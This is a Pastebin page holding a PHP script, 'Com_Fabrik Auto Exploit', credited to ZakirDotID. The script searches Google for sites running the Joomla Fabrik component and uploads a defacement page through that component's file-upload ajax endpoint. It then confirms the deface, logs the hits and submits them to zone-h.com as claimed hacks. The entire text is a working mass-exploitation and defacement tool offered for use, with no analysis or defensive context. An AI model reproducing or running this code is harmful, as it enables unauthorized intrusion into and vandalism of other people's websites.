Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Com_Fabrik Auto Exploit
- Re Code By ZakirDotID
- Thanks To : IndoXploit
- */
- class excom
- {
- public $url;
- public $file;
- public $hacker = "ZakirDotID";
- public $dorking=1; //Ubah jadi 1 jika ingin aktifkan mode auto dorking
- public $var;
- public $ch;
- public function valid($url){
- if(!preg_match("/^http:\/\//", $url) and !preg_match("/^https:\/\//", $url)){
- return $this->url="http://".$url;
- }else{
- return $url;
- }
- }
- public function jonh($url){
- $this->var = $this->cUrl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
- if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $this->var->response, $matches)) {
- if($matches[1] === "ERROR") {
- preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $this->var->response, $matches2);
- echo "[!] $url ==> Not Vuln Zone-H\n";
- } else {
- echo "[+] $url ==> Success\n";
- }
- }
- }
- public function simpan($file){$this->var=fopen("hasil-exploit.txt", "a+");fwrite($this->var, $file."\r\n");fclose($this->var);}
- public function exploit(){
- $this->file ="sad.htm";
- $this->ur1 = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
- $this->var = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$this->ur1\"");
- $this->result = (object) json_decode($this->var,true);
- if(isset($this->result->error)){
- echo "[!] ".parse_url($this->url,PHP_URL_HOST). " ==> Failed\n";
- } else {
- if(isset($this->result->uri)){
- if(preg_match("/hacked/i", $this->cUrl($this->uri)->response)){
- echo "[+] $this->result->uri ==> eXploit\n";
- $this->jonh($this->uri);
- $this->simpan($this->uri);
- }
- }
- }
- }
- public function cUrl($url,$data=null,$headers=null,$cookie=true){
- $this->ch = curl_init();
- curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt($this->ch, CURLOPT_URL, $url);
- curl_setopt($this->ch, CURLOPT_USERAGENT, "LinuxG3k/10.1");
- curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, FALSE);
- curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, FALSE);
- curl_setopt($this->ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($this->ch, CURLOPT_TIMEOUT, 5);
- if($data !== null) {
- curl_setopt($this->ch, CURLOPT_CUSTOMREQUEST, "POST");
- curl_setopt($this->ch, CURLOPT_POST, TRUE);
- curl_setopt($this->ch, CURLOPT_POSTFIELDS, $data);
- }
- if($headers !== null) {
- curl_setopt($this->ch, CURLOPT_HTTPHEADER, $headers);
- }
- if($cookie === true) {
- curl_setopt($this->ch, CURLOPT_COOKIE, TRUE);
- curl_setopt($this->ch, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($this->ch, CURLOPT_COOKIEJAR, "cookie.txt");
- }
- $this->exec = curl_exec($this->ch);
- $this->info = curl_getinfo($this->ch);
- curl_close($this->ch);
- return (object) [
- "response" => $this->exec,
- "info" => $this->info
- ];
- }
- public function _rd(){return fopen("php://stdin", "r");}
- }
- $z = new excom();
- echo "\n\tExploit Com Fabrik With Auto Dorking By ZakirDotID\n";
- if($z->dorking == 1){
- $links = array();
- $dork ="inurl:/index.php?option=com_fabrik";
- for($i=0;$i<=1000;$i+=10){
- @$xml = new DOMDocument('1.0', "UTF-8");
- @$xml->loadHTMLFile("http://www.google.com/search?q=".urlencode($dork)."&start=$i");
- foreach($xml->getElementsByTagName('cite') as $link) {
- $su = "http://$link->nodeValue";
- $ahh = parse_url($su, PHP_URL_HOST);
- if(in_array($ahh, $links) or preg_match("/blogspot/",$ahh)) {
- echo "$ahh element is in the array";
- } else{
- $links[] = $ahh;
- foreach ($links as $asu) {
- $z->url = $z->valid($asu);
- echo $z->exploit();
- }
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement